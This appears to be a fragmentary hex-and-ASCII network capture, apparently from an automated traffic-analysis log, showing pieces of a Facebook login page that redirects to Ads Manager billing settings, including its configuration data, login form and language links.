                                                                                                                                  2022-10-17 20:07:22 UTC1360INData Raw: 67 22 2c 5b 5d 2c 7b 22 63 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 63 70 70 6f 22 3a 7b 22 74 22 3a 38 36 34 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 64 70 72 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 69 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 73 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 73 74 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 53 74 72 69 63 74 22 7d 2c 22 69 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6c 6f 63 61 6c 65 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6d 5f 6c
                                                                                                                                  Data Ascii: g",[],{"c_user":{"s":"None"},"cppo":{"t":86400,"s":"None"},"dpr":{"t":604800,"s":"None"},"fbl_ci":{"t":31536000,"s":"None"},"fbl_cs":{"t":31536000,"s":"None"},"fbl_st":{"t":31536000,"s":"Strict"},"i_user":{"s":"None"},"locale":{"t":604800,"s":"None"},"m_l
                                                                                                                                  2022-10-17 20:07:22 UTC1362INData Raw: 73 74 5f 62 61 73 65 5f 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 22 2c 22 6d 61 6e 69 66 65 73 74 5f 6f 72 69 67 69 6e 22 3a 6e 75 6c 6c 2c 22 62 65 5f 6f 6e 65 5f 61 68 65 61 64 22 3a 66 61 6c 73 65 2c 22 69 73 5f 72 74 6c 22 3a 66 61 6c 73 65 2c 22 69 73 5f 63 6f 6d 65 74 22 3a 66 61 6c 73 65 2c 22 69 73 5f 65 78 70 65 72 69 6d 65 6e 74 61 6c 5f 74 69 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 5f 6a 69 74 5f 77 61 72 6d 65 64 5f 75 70 22 3a 74 72 75 65 2c 22 68 73 69 22 3a 22 37 31 35 35 35 37 35 34 36 38 34 31 37 37 34 36 32 37 33 22 2c 22 73 65 6d 72 5f 68 6f 73 74 5f 62 75 63 6b 65 74 22 3a 22 33 22 2c 22 62 6c 5f 68 61 73 68 5f 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73 6b 69 70 5f 72 64 5f 62
                                                                                                                                  Data Ascii: st_base_uri":"https:\/\/static.xx.fbcdn.net","manifest_origin":null,"be_one_ahead":false,"is_rtl":false,"is_comet":false,"is_experimental_tier":false,"is_jit_warmed_up":true,"hsi":"7155575468417746273","semr_host_bucket":"3","bl_hash_version":2,"skip_rd_b
                                                                                                                                  2022-10-17 20:07:22 UTC1363INData Raw: 53 49 4e 45 53 53 5f 47 52 41 50 48 5f 53 45 54 54 49 4e 47 5f 57 41 42 41 5f 41 53 53 49 47 4e 45 44 5f 55 53 45 52 53 5f 4e 45 57 5f 41 50 49 22 2c 22 41 44 53 5f 50 4c 41 43 45 4d 45 4e 54 5f 46 49 58 5f 50 55 42 4c 49 53 48 45 52 5f 50 4c 41 54 46 4f 52 4d 53 5f 4d 55 54 41 54 49 4f 4e 22 2c 22 46 4f 52 43 45 5f 46 45 54 43 48 5f 42 4f 4f 53 54 45 44 5f 43 4f 4d 50 4f 4e 45 4e 54 5f 41 46 54 45 52 5f 41 44 53 5f 43 52 45 41 54 49 4f 4e 22 2c 22 56 49 44 45 4f 5f 44 49 4d 45 4e 53 49 4f 4e 53 5f 46 52 4f 4d 5f 50 4c 41 59 45 52 5f 49 4e 5f 55 50 4c 4f 41 44 5f 44 49 41 4c 4f 47 22 2c 22 53 4e 49 56 59 5f 47 52 4f 55 50 5f 42 59 5f 45 56 45 4e 54 5f 54 52 41 43 45 5f 49 44 5f 41 4e 44 5f 4e 41 4d 45 22 2c 22 41 44 53 5f 53 54 4f 52 45 5f 56 49 53 49 54
                                                                                                                                  Data Ascii: SINESS_GRAPH_SETTING_WABA_ASSIGNED_USERS_NEW_API","ADS_PLACEMENT_FIX_PUBLISHER_PLATFORMS_MUTATION","FORCE_FETCH_BOOSTED_COMPONENT_AFTER_ADS_CREATION","VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG","SNIVY_GROUP_BY_EVENT_TRACE_ID_AND_NAME","ADS_STORE_VISIT
                                                                                                                                  2022-10-17 20:07:22 UTC1365INData Raw: 61 53 74 6f 72 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 65 78 70 61 6e 64 6f 4b 65 79 22 3a 22 5f 5f 46 42 5f 53 54 4f 52 45 22 2c 22 75 73 65 45 78 70 61 6e 64 6f 22 3a 74 72 75 65 7d 2c 32 39 31 35 5d 2c 5b 22 43 6f 6f 6b 69 65 43 6f 72 65 4c 6f 67 67 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6d 61 78 69 6d 75 6d 49 67 6e 6f 72 61 62 6c 65 53 74 61 6c 6c 4d 73 22 3a 31 36 2e 36 37 2c 22 73 61 6d 70 6c 65 52 61 74 65 22 3a 39 2e 37 65 2d 35 2c 22 73 61 6d 70 6c 65 52 61 74 65 43 6c 61 73 73 69 63 22 3a 31 2e 30 65 2d 31 30 2c 22 73 61 6d 70 6c 65 52 61 74 65 46 61 73 74 53 74 61 6c 65 22 3a 31 2e 30 65 2d 38 7d 2c 33 34 30 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 49 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b
                                                                                                                                  Data Ascii: aStoreConfig",[],{"expandoKey":"__FB_STORE","useExpando":true},2915],["CookieCoreLoggingConfig",[],{"maximumIgnorableStallMs":16.67,"sampleRate":9.7e-5,"sampleRateClassic":1.0e-10,"sampleRateFastStale":1.0e-8},3401],["ImmediateImplementationExperiments",[
                                                                                                                                  2022-10-17 20:07:22 UTC1366INData Raw: 6a 4a 66 65 4b 70 72 6c 55 55 4f 31 51 53 30 6f 45 71 5a 72 4e 56 22 2c 22 61 6c 6c 6f 77 6c 69 73 74 65 64 5f 69 66 72 61 6d 65 73 22 3a 5b 5d 7d 2c 35 35 34 30 5d 2c 5b 22 42 69 67 50 69 70 65 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b 5d 2c 7b 22 6c 69 6e 6b 5f 69 6d 61 67 65 73 5f 74 6f 5f 70 61 67 65 6c 65 74 73 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 62 69 67 70 69 70 65 5f 70 6c 75 67 69 6e 73 22 3a 66 61 6c 73 65 7d 2c 39 30 37 5d 2c 5b 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 48 6f 6c 64 6f 75 74 22 2c 5b 5d 2c 7b 22 64 69 73 61 62 6c 65 5f 76 61 72 69 61 74 69 6f 6e 22 3a 66 61 6c 73 65 7d 2c 36 35 33 33 5d 2c 5b 22 41 73 79 6e 63 52 65 71 75 65 73 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 72 65 74 72 79 4f 6e 4e 65 74 77 6f 72 6b 45 72
                                                                                                                                  Data Ascii: jJfeKprlUUO1QS0oEqZrNV","allowlisted_iframes":[]},5540],["BigPipeExperiments",[],{"link_images_to_pagelets":false,"enable_bigpipe_plugins":false},907],["IntlVariationHoldout",[],{"disable_variation":false},6533],["AsyncRequestConfig",[],{"retryOnNetworkEr
                                                                                                                                  2022-10-17 20:07:22 UTC1368INData Raw: 6f 6e 73 5f 61 6e 64 72 6f 69 64 2e 6a 73 6f 6e 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 41 70 70 49 6e 76 69 74 65 73 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4f 41 75 74 68 53 68 69 6d 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4c 69 6b 65 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 71 70 5c 2f 69 6e 74 65 72 73 74 69 74 69 61 6c 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 63 6c 6f 73 65 5c 2f 22
                                                                                                                                  Data Ascii: ons_android.json":0,"\/connect\/jsdialog\/MPlatformAppInvitesJSDialog\/":0,"\/connect\/jsdialog\/MPlatformOAuthShimJSDialog\/":0,"\/connect\/jsdialog\/MPlatformLikeJSDialog\/":0,"\/qp\/interstitial\/":1,"\/qp\/action\/redirect\/":1,"\/qp\/action\/close\/"
                                                                                                                                  2022-10-17 20:07:22 UTC1494INData Raw: 72 74 65 72 5c 2f 22 3a 31 2c 22 5c 2f 63 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 65 67 61 6c 5c 2f 74 65 72 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 61 63 63 6f 75 6e 74 5c 2f 22 3a 31 2c 22 5c 2f 6e 5c 2f 22 3a 31 2c 22 5c 2f 72 65 6d 6f 74 65 5f 74 65 73 74 5f 64 65 76 69 63 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 63 6f 6e 66 69 72 6d 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 72 65 73 75 6c 74 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 70 72 6f 6d 6f 73 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 63 6f 6e 74 69 6e 75 65 5c 2f 22 3a 31
                                                                                                                                  Data Ascii: rter\/":1,"\/cr.php":1,"\/legal\/terms\/":1,"\/login.php":1,"\/login\/":1,"\/mobile\/account\/":1,"\/n\/":1,"\/remote_test_device\/":1,"\/upsell\/buy\/":1,"\/upsell\/buyconfirm\/":1,"\/upsell\/buyresult\/":1,"\/upsell\/promos\/":1,"\/upsell\/continue\/":1
                                                                                                                                  2022-10-17 20:07:22 UTC1495INData Raw: 65 74 75 72 6e 20 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 2e 4e 55 4d 42 45 52 5f 4f 54 48 45 52 3b 20 7d 22 7d 2c 33 34 30 35 5d 2c 5b 22 53 65 72 76 65 72 54 69 6d 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 73 65 72 76 65 72 54 69 6d 65 22 3a 31 36 36 36 30 33 37 32 34 32 37 32 33 2c 22 74 69 6d 65 4f 66 52 65 71 75 65 73 74 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 34 32 37 30 34 2e 39 2c 22 74 69 6d 65 4f 66 52 65 73 70 6f 6e 73 65 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 34 32 37 30 34 2e 39 7d 2c 35 39 34 33 5d 2c 5b 22 46 62 74 51 54 4f 76 65 72 72 69 64 65 73 22 2c 5b 5d 2c 7b 22 6f 76 65 72 72 69 64 65 73 22 3a 7b 7d 7d 2c 35 35 31 5d 2c 5b 22 41 6e 61 6c 79 74 69 63 73 43 6f 72 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 64 65 76 69 63 65 5f 69 64 22
                                                                                                                                  Data Ascii: eturn IntlVariations.NUMBER_OTHER; }"},3405],["ServerTimeData",[],{"serverTime":1666037242723,"timeOfRequestStart":1666037242704.9,"timeOfResponseStart":1666037242704.9},5943],["FbtQTOverrides",[],{"overrides":{}},551],["AnalyticsCoreData",[],{"device_id"
                                                                                                                                  2022-10-17 20:07:22 UTC1497INData Raw: 74 35 53 48 4b 30 63 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 39 36 34 36 32 22 2c 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 32 30 6c 69 73 66 64 5f 79 44 46 55 72 5a 5a 5f 68 7a 79 6f 67 61 68 38 48 31 56 42 33 77 75 42 78 30 69 7a 70 4e 6d 4f 66 7a 4e 75 67 58 79 70 61 7a 53 77 48 35 53 2d 55 64 55 70 41 6a 43 46 77 42 77 51 2d 50 71 4e 6a 77 4e 63 74 66 47 32 6d 74 35 53 48 4b 30 63 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 36 36 33 33 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75
                                                                                                                                  Data Ascii: t5SHK0ck"]},-1],["cr:896462",["setIntervalAcrossTransitionsBlue"],{"__rc":["setIntervalAcrossTransitionsBlue","Aa20lisfd_yDFUrZZ_hzyogah8H1VB3wuBx0izpNmOfzNugXypazSwH5S-UdUpAjCFwBwQ-PqNjwNctfG2mt5SHK0ck"]},-1],["cr:986633",["setTimeoutAcrossTransitionsBlu
                                                                                                                                  2022-10-17 20:07:22 UTC1498INData Raw: 6f 75 73 65 6f 76 65 72 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 6f 75 74 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 77 68 65 65 6c 22 3a 31 2c 22 4d 53 50 6f 69 6e 74 65 72 4d 6f 76 65 22 3a 31 30 30 30 30 2c 22 6b 65 79 64 6f 77 6e 22 3a 30 2e 31 2c 22 63 6c 69 63 6b 22 3a 30 2e 30 32 2c 22 6d 6f 75 73 65 75 70 22 3a 30 2e 30 32 2c 22 5f 5f 31 30 30 6d 73 22 3a 30 2e 30 30 31 2c 22 5f 5f 64 65 66 61 75 6c 74 22 3a 35 30 30 30 2c 22 5f 5f 6d 69 6e 22 3a 31 30 30 2c 22 5f 5f 69 6e 74 65 72 61 63 74 69 6f 6e 44 65 66 61 75 6c 74 22 3a 32 30 30 2c 22 5f 5f 65 76 65 6e 74 44 65 66 61 75 6c 74 22 3a 31 30 30 30 30 30 7d 2c 22 70 61 67 65 5f 73 61 6d 70 6c 69 6e 67 5f 62 6f 6f 73 74 22 3a 31 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 72 65 67 65 78 65 73 22 3a
                                                                                                                                  Data Ascii: ouseover":10000,"mouseout":10000,"mousewheel":1,"MSPointerMove":10000,"keydown":0.1,"click":0.02,"mouseup":0.02,"__100ms":0.001,"__default":5000,"__min":100,"__interactionDefault":200,"__eventDefault":100000},"page_sampling_boost":1,"interaction_regexes":
                                                                                                                                  2022-10-17 20:07:22 UTC1500INData Raw: 61 78 2d 20 5f 39 61 78 5f 20 5f 39 61 79 31 20 55 49 50 61 67 65 5f 4c 6f 67 67 65 64 4f 75 74 20 68 61 73 42 61 6e 6e 65 72 20 5f 2d 6b 62 20 5f 36 30 35 61 20 62 5f 63 33 70 79 6e 2d 61 68 68 20 63 68 72 6f 6d 65 20 77 65 62 6b 69 74 20 77 69 6e 20 78 31 20 4c 6f 63 61 6c 65 5f 65 6e 5f 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 35 6e 51 58 75 57 53 55 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 62 6f 6f 74 73 74 72 61 70 57 65 62 53 65 73 73 69 6f 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 6a 28 31 36 36 36 30 33 37 32 34 32 29 7d 29 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 6c 69 22 20 69 64 3d 22 75 5f 30
                                                                                                                                  Data Ascii: ax- _9ax_ _9ay1 UIPage_LoggedOut hasBanner _-kb _605a b_c3pyn-ahh chrome webkit win x1 Locale_en_US" dir="ltr"><script type="text/javascript" nonce="5nQXuWSU">requireLazy(["bootstrapWebSession"],function(j){j(1666037242)})</script><div class="_li" id="u_0
                                                                                                                                  2022-10-17 20:07:22 UTC1501INData Raw: 66 66 22 20 69 64 3d 22 65 72 72 6f 72 5f 62 6f 78 22 20 2f 3e 3c 64 69 76 20 69 64 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 64 69 73 70 6c 61 79 22 20 6e 61 6d 65 3d 22 64 69 73 70 6c 61 79 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 69 73 70 72 69 76 61 74 65 22 20 6e 61 6d 65 3d 22 69 73 70 72 69 76 61 74 65 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 72 65 74 75 72 6e 5f 73
                                                                                                                                  Data Ascii: ff" id="error_box" /><div id="loginform"><input type="hidden" autocomplete="off" id="display" name="display" value="" /><input type="hidden" autocomplete="off" id="isprivate" name="isprivate" value="" /><input type="hidden" autocomplete="off" id="return_s
                                                                                                                                  2022-10-17 20:07:22 UTC1503INData Raw: 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 74 22 3e 3c 62 75 74 74 6f 6e 20 76 61 6c 75 65 3d 22 31 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 32 65 30 20 5f 34 6a 79 36 20 5f 34 6a 79 31 20 73 65 6c 65 63 74 65 64 20 5f 35 31 73 79 22 20 69 64 3d 22 6c 6f 67 69 6e 62 75 74 74 6f 6e 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 4c 6f 67 20 49 6e 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 76 20 66 73 6d 20 66 77 6e 20 66 63 67 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 6c 69 6e 6b 22 3e 3c 61 20 68
                                                                                                                                  Data Ascii: div></div></a></div></div></div></div><div class="_xkt"><button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy" id="loginbutton" name="login" tabindex="0" type="submit">Log In</button></div><div class="_xkv fsm fwn fcg" id="login_link"><a h
                                                                                                                                  2022-10-17 20:07:22 UTC1504INData Raw: 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 67 65 28 22 65 6d 61 69 6c 22 29 2c 63 3d 67 65 28 22 70 61 73 73 22 29 3b 74 72 79 7b 62 26 26 21 62 2e 76 61 6c 75 65 3f 62 2e 66 6f 63 75 73 28 29 3a 63 26 26 63 2e 66 6f 63 75 73 28 29 7d 63 61 74 63 68 28 61 29 7b 69 66 28 21 28 61 2e 6e 75 6d 62 65 72 3d 3d 2d 32 31 34 36 38 32 36 31 37 38 29 29 74 68 72 6f 77 20 61 7d 72 65 74 75 72 6e 20 61 26 26 61 2e 63 61 6c 6c 28 77 69 6e 64 6f 77 29 7d 7d 28 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 29 3b 66 75 6e 63 74 69 6f 6e 20 70 6f 70 28 61 29 7b 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 72 65 6c 6f 61 64 5f 6f 6e 5f 6e 65 77 5f 63 6f 6f 6b 69 65 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 61
                                                                                                                                  Data Ascii: {return function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a
                                                                                                                                  2022-10-17 20:07:22 UTC1506INData Raw: 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 66 72 5f 46 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 66 72 2d 66 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74
                                                                                                                                  Data Ascii: ook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=ht
                                                                                                                                  2022-10-17 20:07:22 UTC1507INData Raw: 50 6f 72 74 75 67 61 6c 29 22 3e 50 6f 72 74 75 67 75 c3 aa 73 20 28 50 6f 72 74 75 67 61 6c 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 71 2d 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f
                                                                                                                                  Data Ascii: Portugal)">Portugus (Portugal)</a></li><li><a class="_sv4" dir="ltr" href="https://sq-al.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLo
                                                                                                                                  2022-10-17 20:07:22 UTC1509INData Raw: 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 36 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 54 75 72 6b 69 73 68 22 3e 54 c3 bc 72 6b c3 a7 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 72 74 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 2d 61 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e
                                                                                                                                  Data Ascii: quot;, &quot;www_list_selector&quot;, 6); return false;" title="Turkish">Trke</a></li><li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" on
                                                                                                                                  2022-10-17 20:07:22 UTC1510INData Raw: 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 39 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 53 69 6d 70 6c 69 66 69 65 64 20 43 68 69 6e 65 73 65 20 28 43 68 69 6e 61 29 22 3e e4 b8 ad e6 96 87 28 e7 ae 80 e4 bd 93 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 31 37 69 20 5f 35 31 37 68 20 5f 35 31 73 79 22 20 72 65 6c 3d 22 64 69 61 6c 6f 67 22 20 61 6a 61 78
                                                                                                                                  Data Ascii: s\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Simplified Chinese (China)">()</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajax
                                                                                                                                  2022-10-17 20:07:22 UTC1512INData Raw: 3a 2f 2f 77 77 77 2e 6f 63 75 6c 75 73 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 4f 63 75 6c 75 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 4f 63 75 6c 75 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 72 74 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 46 61 63 65 62 6f 6f 6b 20 50 6f 72 74 61 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 6f 72 74 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 25 33 41 25 32 46 25 32
                                                                                                                                  Data Ascii: ://www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2
